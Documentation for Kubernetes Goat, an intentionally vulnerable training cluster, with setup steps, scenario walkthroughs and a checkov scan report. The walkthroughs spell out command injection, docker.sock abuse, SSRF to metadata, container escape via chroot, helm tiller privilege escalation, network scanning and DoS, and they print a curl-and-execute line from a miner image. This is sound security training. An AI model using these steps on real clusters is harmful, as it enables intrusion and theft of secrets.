About Kubernetes Goat
Kubernetes Goat is designed to be an intentionally vulnerable cluster environment to learn and practice Kubernetes security.
Disclaimer & Warnings
Kubernetes Goat creates intentionally vulnerable resources into your cluster. DO NOT deploy Kubernetes Goat in a production environment or alongside any sensitive cluster resources.
Kubernetes Goat Scenarios
- Sensitive keys in code bases
- DIND (docker-in-docker) exploitation
- SSRF in K8S world
- Container escape to access host system
- Docker CIS Benchmarks analysis
- Kubernetes CIS Benchmarks analysis
- Attacking private registry
- NodePort exposed services
- Helm v2 tiller to PwN the cluster
- Analysing crypto miner container
- Kubernetes Namespaces bypass
- Gaining environment information
- DoS the memory/cpu resources
- Hacker Container preview
Kubernetes Goat Architecture
TBD
Author
Kubernetes Goat was created by Madhu Akula
Madhu Akula is a security ninja, published author, and cloud native security researcher with an extensive experience. Also, he is an active member of the international security, devops and cloud native communities (null, DevSecOps, AllDayDevOps, etc). Holds industry certifications like OSCP (Offensive Security Certified Professional), CKA (Certified Kubernetes Administrator), etc. Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON (24, 26 & 27), BlackHat USA (2018 & 19), USENIX LISA (2018 & 19), O’Reilly Velocity EU 2019, GitHub Satellite 2020, Appsec EU (2018 & 19), All Day DevOps (2016, 17, 18, 19 & 20), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon (2018, 19), SACON 2019, Serverless Summit, null and multiple others. His research has identified vulnerabilities in over 200+ companies and organizations including; Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP and Adobe, etc and credited with multiple CVE’s, Acknowledgements and rewards. He is co-author of Security Automation with Ansible2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. Also won 1st prize for building an infrastructure security monitoring solution at InMobi flagship hackathon among 100+ engineering teams.
Learning Kubernetes
Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google and is now maintained by the Cloud Native Computing Foundation. - Wikipedia
What is Kubernetes - The Illustrated Children's Guide to Kubernetes
source: https://www.youtube.com/watch?v=4ht22ReBjno
Kubernetes Overview
Image source: Khtan66 CC BY-SA 4.0, from Wikimedia Commons
Resources to learn more about Kubernetes
Kubernetes Cluster Setup
Before we set up the Kubernetes Goat, we need to have a working Kubernetes cluster admin access.
There are many ways you can run the Kubernetes Cluster. Some of them include running in
- Cloud provider Kubernetes service (like GKE, EKS, AKS, DO, etc.)
- Locally provisioned cluster
- Minikube environnement
- Katacoda Playground
Refer to the Kubernetes setup documentation for more information and details at https://kubernetes.io/docs/setup/
Kubernetes playground by Katacoda
https://katacoda.com/madhuakula/scenarios/kubernetes-goat
Google Kubernetes Engine(GKE) Setup
-
Navigate to your Google cloud console https://console.cloud.google.com
-
Choose the project you want to set up the Kubernetes Cluster in Google Cloud
-
Then open the Google Cloud Shell. Click on the top right terminal icon
Creating new GKE cluster
# Importing required environment variables
export KUBERNETESGOATCLUSTERNAME="kubernetes-goat"
export KUBERNETESGOATREGION="us-central1"
export KUBERNETESGOATCLUSTERVERSION="1.16.8-gke.15"
export KUBERNETESGOATPROJECTNAME="<YOUR GOOGLE PROJECT ID>"
# Setup the GKE cluster
gcloud beta container --project "$KUBERNETESGOATPROJECTNAME" clusters create "$KUBERNETESGOATCLUSTERNAME" --zone "$KUBERNETESGOATREGION-a" --no-enable-basic-auth --cluster-version "$KUBERNETESGOATCLUSTERVERSION" --machine-type "n1-standard-1" --image-type "UBUNTU" --disk-type "pd-standard" --disk-size "50" --metadata disable-legacy-endpoints=true,GOAT_KEY="azhzLWdvYXQtNmJlNGRkMWI3ZmE4NGUzNzA0ODllZGQ2NDA0MWQ2MTk=" --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --preemptible --num-nodes "2" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/$KUBERNETESGOATPROJECTNAME/global/networks/default" --subnetwork "projects/$KUBERNETESGOATPROJECTNAME/regions/$KUBERNETESGOATREGION/subnetworks/default" --default-max-pods-per-node "110" --enable-autoscaling --min-nodes "1" --max-nodes "5" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --no-enable-autoupgrade --no-enable-autorepair --maintenance-window "03:00"
# Get the GKE cluster credentials to Google Cloud Shell
gcloud container clusters get-credentials $KUBERNETESGOATCLUSTERNAME --zone $KUBERNETESGOATREGION-a --project $KUBERNETESGOATPROJECTNAME
- Check the Kubernetes cluster access by running
kubectl version --short
Miscellaneous
- When you start the new project or creating Kubernetes cluster first time in GKE, it might take a while to enable the API. So you might see below error/message information.
Kubernetes Engine API is being enabled. This may take a minute or more. Learn more
Kubernetes Goat Setup
This document explains the steps to set up the Kubernetes Goat in your Kubernetes Cluster.
Please do not set up Kubernetes Goat in your production workloads, as this is designed to be intentionally vulnerable.
Free online Kubernetes Goat playground
https://katacoda.com/madhuakula/scenarios/kubernetes-goat
Pre-requisites
- Ensure you have admin access to the Kubernetes cluster
- Refer to kubectl releases for binaries https://kubernetes.io/docs/tasks/tools/install-kubectl/
- Verify by running
kubectl version
- Ensure you have helm version 2 setup in your path as
helm2
- Refer to helm version 2 releases for binaries https://github.com/helm/helm/releases
- Verify by running
helm2 version
Setting up Kubernetes Goat
- To set up the Kubernetes Goat resources in your cluster, run the following commands
git clone https://github.com/madhuakula/kubernetes-goat.git
cd kubernetes-goat
bash setup-kubernetes-goat.sh
Scenarios
Welcome to Kubernetes Goat Scenarios. This is the home for exploring your Kubernetes Goat scenarios, discovery, exploitation, attacks, endpoints, etc.
Ensure you have kubectl
and docker
binary installed in your host system to get maximum out of this training platform. Follow each scenario by clicking on the scenario.
Access the Kubernetes Goat environment resources
- Ensure the pods are in running state before running the access script
kubectl get pods
- Run the following script to access the environment
bash access-kubernetes-goat.sh
- Then navigate to http://127.0.0.1:1234
Flags looks like below
The flag format looks like
k8s-goat-2912d3d0b262bb16afbe450034089463
List of Scenarios
- Sensitive keys in code bases
- DIND (docker-in-docker) exploitation
- SSRF in K8S world
- Container escape to access host system
- Docker CIS Benchmarks analysis
- Kubernetes CIS Benchmarks analysis
- Attacking private registry
- NodePort exposed services
- Helm v2 tiller to PwN the cluster
- Analysing crypto miner container
- Kubernetes Namespaces bypass
- Gaining environment information
- DoS the memory/cpu resources
- Hacker Container preview
Sensitive keys in codebases
Scenario Information
Developers tend to commit sensitive information to version control systems. As we are moving towards CI/CD and GitOps systems, we tend to forgot to identify sensitive information in code and commits. Let's see if we can find something cool here!
- To get started with the scenario, navigate to http://127.0.0.1:1230
Scenario Solution
Method 1
After reading the scenario description and application information. We have performed some discovery and analysis, then identified that it has .git
folder exposed within the application.
- Clone the git repository locally by running the following command. Ensure you have set up git-dumper locally before running the below command
python3 git-dumper.py http://localhost:1230/.git k8s-goat-git
- Now check the git log information
cd k8s-goat-git
git log
- Checkout an old commit for a specific version
git checkout 128029d89797957957b2a7198d8d159b239b34eb
ls -la
cat .env
Method 2
Sometimes, we ideally have access to the pods or containers access and we can also perform analysis from within the container as well.
export POD_NAME=$(kubectl get pods --namespace default -l "app=build-code" -o jsonpath="{.items[0].metadata.name}")
kubectl exec -it $POD_NAME -- sh
- Then we can perform analysis on
.git
folder by running utilities like trufflehog
trufflehog .
Miscellaneous
TBD
DIND (docker-in-docker) exploitation
Scenario Information
Most of the CI/CD and pipeline systems that use Docker and build containers for you within the pipeline use something called DIND (docker-in-docker). Here in this scenario, we try to exploit and gain access to the host system.
- To get started with the scenario, navigate to http://127.0.0.1:1231
Scenario Solution
- By looking at application functionality, identified that it has command injection vulnerability
127.0.0.1; id
- After performing quite some analysis, identified the there is a
docker.sock
mount available in the file system
;mount
- Download the
docker
static binary from internet https://download.docker.com/linux/static/stable/
;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz
- Extract the binary from the
docker-19.03.9.tgz
file
;tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/
- Access the host system by running the following docker commands with
docker.sock
;/tmp/docker/docker -H unix:///custom/docker/docker.sock ps
;/tmp/docker/docker -H unix:///custom/docker/docker.sock images
Miscellaneous
TBD
SSRF in K8S world
Scenario Information
SSRF (Server Side Request Forgery) vulnerability became the go-to attack for cloud native environments. Here in this scenario, we will see how we can exploit an application vulnerability like SSRF to gain access to cloud instance metadata as well as internal services metadata information.
- To get started with the scenario, navigate to http://127.0.0.1:1232
Scenario Solution
Based on the description, we know that this application possibly vulnerable to the SSRF vulnerability. Let's go ahead and access the default instance metadata service using
169.254.169.254
. Identify which cloud provider you are running this service, then use specific headers, and queries.
- Let's also run and see what all ports running with in the same pod/container. The endpoint is
http://127.0.0.1:5000
and methodGET
- Now we can see that there is an internal-only exposed service with-in the cluster called
http://metadata-db
- After enumerating through the entire key values, finally identified the flag at
http://metadata-db/latest/secrets/kubernetes-goat
- Then decoding the base64 returns the flag as
k8s-goat-ca90ef85db7a5aef0198d02fb0df9cab
echo -n "azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI=" | base64 -d
Miscellaneous
TBD
Container escape to access the host system
Scenario Information
Most of the monitoring, tracing, and debugging software requires to run with extra privileges and capabilities. Here in this scenario, we will see a pod with extra capabilities and privileges including HostPath allows us to gain access to the host system and provide Node level configuration to gain complete cluster compromise.
- To get started with the scenario, navigate to http://127.0.0.1:1233
Scenario Solution
After performing the analysis, we identified that this container has complete privileges of the host system and allowed privilege escalation. As well as /host-system
is mounted from the host system.
ls /
ls /host-system/
- Gaining the host system privileges access
chroot
chroot /host-system bash
docker ps
- Accessing the node level kubelet Kubernetes configuration
cat /var/lib/kubelet/kubeconfig
Download the kubectl locally to use this config and perform operations
- Using the kubelet configuration to perform Kubernetes cluster-wide resources
kubectl --kubeconfig /var/lib/kubelet/kubeconfig get all -n kube-system
- From here we can go beyond by performing the lateral moment and post exploitation
Miscellaneous
TBD
Docker CIS Benchmarks analysis
Scenario Information
This scenario is mainly to perform the Docker CIS benchmarks analysis on top of Kubernetes nodes to identify the possible security vulnerabilities.
- To get started with this scenario you can either access the node and perform by following docker bench security or run the following command to deploy docker bench security as a DaemonSet
kubectl apply -f scenarios/docker-bench-security/deployment.yaml
kubectl get daemonsets
Scenario Solution
- Access the each
docker-bench-security-xxxxx
pod based on how many nodes you have in Kubernetes cluster and run the Docker CIS benchmarks
kubectl exec -it docker-bench-security-xxxxx -- sh
cd docker-bench-security
- Run the Docker CIS benchmarks script
sh docker-bench-security.sh
- Now based on the vulnerabilities you see from the Docker CIS benchmarks, you can proceed with further exploitation
Miscellaneous
TBD
Kubernetes CIS Benchmarks analysis
Scenario Information
This scenario is mainly to perform the Kubernetes CIS benchmarks analysis on top of Kubernetes nodes to identify the possible security vulnerabilities.
- To get started with this scenario you can either access the node and perform by following kube-bench security or run the following command to deploy kube-bench as Kubernetes job
kubectl apply -f scenarios/kube-bench-security/node-job.yaml
kubectl apply -f scenarios/kube-bench-security/master-job.yaml
Scenario Solution
- Now go ahead and get the jobs list and pods information by running the below commands
kubectl get jobs
kubectl logs -f kube-bench-node-xxxxx
- Now based on the vulnerabilities you see from the Kubernetes CIS benchmarks, you can proceed with further exploitation
Miscellaneous
TBD
Attacking private registry
Scenario Information
A container registry is a place where all the container images get pushed. Most of the time each organization has its own private registry. Also sometimes it ends up misconfigured, public/open. On the other hand, developers assume that their internal private registry only and end up storing all the sensitive information inside the container images. Let's see what we can find here.
- To get started with the scenario, navigate to http://127.0.0.1:1235
Scenario Solution
As this is an intentionally vulnerable design, we directly provided the endpoint. In the real-world you have to do some recon.
-
Based on the scenario and information, we identified that it's possible docker container private registry
-
After reading some docs and googling, here are the simple API endpoint queries for the container registry
curl http://127.0.0.1:1235/v2/
curl http://127.0.0.1:1235/v2/_catalog
- Get more information about the images inside the registry from the API using below queries
curl http://127.0.0.1:1235/v2/madhuakula/k8s-goat-users-repo/manifests/latest
- Now, we observed that the docker container has ENV variable with API key information
This can be taken a little further by using the
docker
client to download the images locally and analysing. Also in some cases you can even push the image to the registry based on the permissions and privileges
Miscellaneous
TBD
NodePort exposed services
Scenario Information
If any of the users exposed any service within the Kubernetes cluster with NodePort
, this means if the nodes where the Kubernetes clusters running doesn't have any firewall/network security enabled. We need to see some unauthenticated and unauthorized services.
- To get started with the scenario, run the following command and look for open ports in the Kubernetes Nodes
kubectl get nodes -o wide
When Kubernetes creates a NodePort service, it allocates a port from a range specified in the flags that define your Kubernetes cluster. (By default, these are ports ranging from 30000-32767.)
Scenario Solution
- Get the list of Kubernetes nodes external IP addresses information
kubectl get nodes -o wide
-
Now, let's find out the open port. In this case, you can use your traditional security scanning utilities like
Nmap
-
Once we identified that there is a NodePort exposed, we can just verify by connecting to it and access
nc -zv EXTERNAL-IP-ADDRESS 30003
This vulnerability/attack varies depends on how the Kubernetes cluster has been configured
Miscellaneous
TBD
Helm v2 tiller to PwN the cluster
Scenario Information
Helm is a package manager for Kubernetes. It's like apt-get
for ubuntu. In this scenario, we will see the older version of helm (version 2), tiller service RBAC default setup to gain access to the completed cluster.
- To get started with the scenario, run the following command
kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash
Scenario Solution
- By default helm version 2 tiller deployment has RBAC with full cluster administrator privileges
- So the default installation is in
kube-system
namespace with service nametiller-deploy
and port44134
exposed to0.0.0.0
. So we can verify by running telnet command
telnet tiller-deploy.kube-system 44134
- Now, we are able to connect to the tiller service port. We can use the helm binary to perform operations and talk to tiller service
helm --host tiller-deploy.kube-system:44134 version
- Let's try if we can get Kubernetes secrets from the cluster from
kube-system
namespace
kubectl get secrets -n kube-system
- Now we can create our own helm chart to give permissions to default service account full cluster admin access, as by default the current pod deployed in default namespace which has the default service account
helm --host tiller-deploy.kube-system:44134 install --name pwnchart /pwnchart
- Now the
pwnchart
has been deployed, it has given all the default service accounts cluster admin access. Hence let's try getting thekube-system
namespace secrets again
kubectl get secrets -n kube-system
This scenario varies how the tiller deployment has been performed, sometimes admins deploy tiller to a specific namespace with specific privilege. Also from Helm version 3, there is no tiller service to mitigate such vulnerabilities
Miscellaneous
Analysing crypto miner container
Scenario Information
Crypto mining has become popular with modern infrastructure. Especially environments like Kubernetes are an easy target as you might not even look at what exactly the container image builds upon and what it is doing with proactive monitoring. Here in this scenario, we will analyse and identify the crypto miner.
- To get started, identify all the resources/images in the Kubernetes cluster. Including Jobs.
kubectl get jobs
Scenario Solution
Identify all resources within a Kubernetes cluster. If possible get into details of each container image available in all the nodes within the cluster as well
- Once we have identified the job we ran in the Kubernetes cluster, got the pod information by running following command
kubectl describe job batch-check-job
- Then get the pod information by running the below command
kubectl get pods --namespace default -l "job-name=batch-check-job"
- Then get the pod information manifest and analyse
kubectl get pod batch-check-job-xxxx -o yaml
-
Identified that it's running
madhuakula/k8s-goat-batch-check
docker image -
After performing analysis of this image we identified it has the mining stuff in the build time script in one of the layer
docker history --no-trunc madhuakula/k8s-goat-batch-check
echo "curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup && chmod +x /usr/bin/system-startup
Miscellaneous
TBD
Kubernetes Namespaces bypass
Scenario Information
By default, Kubernetes uses a flat networking schema, which means any pod/service within the cluster can talk to other. The namespaces within the cluster don't have any network security restrictions by default. Anyone in the namespace can talk to other namespaces. We heard that Kubernetes-Goat loves cache. Let's see if we gain access to other namespaces
- To get started with the scenario, let's run our awesome
hacker-container
in the default namespace
kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh
Scenario Solution
- Get the cluster IP range information
ip route
ifconfig
printenv
- Based on the analysis/understanding about the system. We can run the internal scan for the entire cluster range using
zamp
zmap -p 6379 10.0.0.0/8 -o results.csv
There is also another way to access the services/pods in the Kubernetes. For example
servicename.namespace
- Let's access the
redis
using thereds-cli
client
redis-cli -h 10.12.0.2
KEYS *
GET SECRETSTUFF
There are many other services and resources exposed within the cluster like ElasticSearch, Mongo, etc. So if your recon skill is good then you got a gold mine here.
Miscellaneous
TBD
Gaining environment information
Scenario Information
Each environment in Kubernetes will have a lot of information to share. Some of the key things include secrets, api keys, configs, services, and a lot more. So let's go ahead and find the vault key!
- To get started with the scenario, navigate to http://127.0.0.1:1233
Scenario Solution
- Go ahead and explore the system as a generic linux system
cat /proc/self/cgroup
cat /etc/hosts
mount
ls -la /home/
- Getting the environment variables, including Kubernetes secrets mounted
K8S_GOAT_VAULT_KEY=k8s-goat-cd2da27224591da2b48ef83826a8a6c
and service names, ports, etc.
printenv
Miscellaneous
TBD
DoS the memory/CPU resources
Scenario Information
There is no specification of resources in the Kubernetes manifests and not applied limit ranges for the containers. As an attacker, we can consume all the resources where the pod/deployment running and starve other resources and cause a DoS for the environment.
- To get started with the scenario, navigate to http://127.0.0.1:1236
Scenario Solution
- This deployment pod has not set any resource limits in the Kubernetes manifests. So we can easily perform the bunch of operations which can consume resources
- In this pod we have installed a utility called
stress-ng
stress-ng --vm 2 --vm-bytes 2G --timeout 30s
- You can see the difference between while running
stress-ng
and after
kubectl top pod hunger-check-deployment-xxxxxxxxxx-xxxxx
This attack may not work in some cases like autoscaling, resource restrictions, etc.
Miscellaneous
TBD
Hacker Container preview
Scenario Information
This scenario is just an exploration of the common security utilities inside the Kubernetes Cluster environment. I think by this time you might have already used hacker-container multiple times.
- To get started with this scenario. Run the hacker container using the below command
kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh
Scenario Solution
Hacker Container is a utility with the list of useful tools/commands while hacking Kubernetes Clusters. So there is not limit to your exploration with Kubernetes environments. Here we will see some of the most useful and powerful utilities
- Container introspection utility to get an overview of the system capabilities, etc.
amicontained
- Performing Nikto scan against internal services
nikto.pl -host http://metadata-db
There are many other use cases. To get the maximum out of hacker-container, we can use with host privileges, volumes, process, etc. Will be updated soon with more details.
Miscellaneous
TBD
Teardown Kubernetes Goat
- Teardown the entire Kubernetes Goat infrastructure
bash teardown-kubernetes-goat.sh
Note: Ensure clean up what you installed and used, It's better to delete the cluster.
Security Scanning Reports
This section contains, security scanning reports by multiple open source security tools reports by scanning the Kubernetes Goat infrastructure.
checkov report for Kubernetes Goat
To identify all of the 232 kubernetes configuration issues run checkov by Bridgecrew
https://twitter.com/BarakSchoster/status/1273170904894377985
check_id | file | resource | check_name | |
---|---|---|---|---|
0 | CKV_K8S_31 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Ensure that the seccomp profile is set to docker/default or runtime/default |
1 | CKV_K8S_40 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Containers should run as a high UID to avoid host conflict |
2 | CKV_K8S_29 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Apply security context to your pods and containers |
3 | CKV_K8S_38 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Ensure that Service Account Tokens are only mounted where necessary |
4 | CKV_K8S_23 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware | Minimize the admission of root containers |
5 | CKV_K8S_37 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Minimize the admission of containers with capabilities assigned |
6 | CKV_K8S_8 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Liveness Probe Should be Configured |
7 | CKV_K8S_12 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Memory requests should be set |
8 | CKV_K8S_20 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Containers should not run with allowPrivilegeEscalation |
9 | CKV_K8S_13 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Memory limits should be set |
10 | CKV_K8S_10 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | CPU requests should be set |
11 | CKV_K8S_22 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Use read-only filesystem for containers where possible |
12 | CKV_K8S_9 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Readiness Probe Should be Configured |
13 | CKV_K8S_28 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Minimize the admission of containers with the NET_RAW capability |
14 | CKV_K8S_30 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Apply security context to your pods and containers |
15 | CKV_K8S_14 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Image Tag should be fixed - not latest or blank |
16 | CKV_K8S_43 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Image should use digest |
17 | CKV_K8S_11 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | CPU limits should be set |
18 | CKV_K8S_31 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
19 | CKV_K8S_40 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Containers should run as a high UID to avoid host conflict |
20 | CKV_K8S_29 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Apply security context to your pods and containers |
21 | CKV_K8S_38 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
22 | CKV_K8S_21 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | The default namespace should not be used |
23 | CKV_K8S_23 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Minimize the admission of root containers |
24 | CKV_K8S_21 | /scenarios/build-code/deployment.yaml | Service.build-code-service.default | The default namespace should not be used |
25 | CKV_K8S_37 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
26 | CKV_K8S_8 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Liveness Probe Should be Configured |
27 | CKV_K8S_12 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Memory requests should be set |
28 | CKV_K8S_20 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
29 | CKV_K8S_10 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | CPU requests should be set |
30 | CKV_K8S_22 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Use read-only filesystem for containers where possible |
31 | CKV_K8S_9 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Readiness Probe Should be Configured |
32 | CKV_K8S_28 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
33 | CKV_K8S_30 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Apply security context to your pods and containers |
34 | CKV_K8S_14 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
35 | CKV_K8S_43 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Image should use digest |
36 | CKV_K8S_31 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
37 | CKV_K8S_27 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Do not expose the docker daemon socket to containers |
38 | CKV_K8S_40 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Containers should run as a high UID to avoid host conflict |
39 | CKV_K8S_19 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Containers should not share the host network namespace |
40 | CKV_K8S_17 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Containers should not share the host process ID namespace |
41 | CKV_K8S_18 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Containers should not share the host IPC namespace |
42 | CKV_K8S_38 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Ensure that Service Account Tokens are only mounted where necessary |
43 | CKV_K8S_21 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | The default namespace should not be used |
44 | CKV_K8S_23 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Minimize the admission of root containers |
45 | CKV_K8S_37 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Minimize the admission of containers with capabilities assigned |
46 | CKV_K8S_8 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Liveness Probe Should be Configured |
47 | CKV_K8S_20 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Containers should not run with allowPrivilegeEscalation |
48 | CKV_K8S_16 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Container should not be privileged |
49 | CKV_K8S_22 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Use read-only filesystem for containers where possible |
50 | CKV_K8S_9 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Readiness Probe Should be Configured |
51 | CKV_K8S_28 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
52 | CKV_K8S_25 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Minimize the admission of containers with added capability |
53 | CKV_K8S_14 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Image Tag should be fixed - not latest or blank |
54 | CKV_K8S_43 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Image should use digest |
55 | CKV_K8S_31 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
56 | CKV_K8S_40 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default | Containers should run as a high UID to avoid host conflict |
57 | CKV_K8S_29 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default | Apply security context to your pods and containers |
58 | CKV_K8S_38 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
59 | CKV_K8S_21 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default | The default namespace should not be used |
60 | CKV_K8S_23 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default | Minimize the admission of root containers |
61 | CKV_K8S_21 | /scenarios/kubernetes-goat-home/deployment.yaml | Service.kubernetes-goat-home-service.default | The default namespace should not be used |
62 | CKV_K8S_37 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
63 | CKV_K8S_8 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Liveness Probe Should be Configured |
64 | CKV_K8S_12 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Memory requests should be set |
65 | CKV_K8S_20 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
66 | CKV_K8S_10 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | CPU requests should be set |
67 | CKV_K8S_22 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Use read-only filesystem for containers where possible |
68 | CKV_K8S_9 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Readiness Probe Should be Configured |
69 | CKV_K8S_28 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
70 | CKV_K8S_30 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Apply security context to your pods and containers |
71 | CKV_K8S_14 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
72 | CKV_K8S_43 | /scenarios/kubernetes-goat-home/deployment.yaml | Deployment.kubernetes-goat-home-deployment.default (container 0) | Image should use digest |
73 | CKV_K8S_31 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
74 | CKV_K8S_40 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default | Containers should run as a high UID to avoid host conflict |
75 | CKV_K8S_29 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default | Apply security context to your pods and containers |
76 | CKV_K8S_38 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default | Ensure that Service Account Tokens are only mounted where necessary |
77 | CKV_K8S_21 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default | The default namespace should not be used |
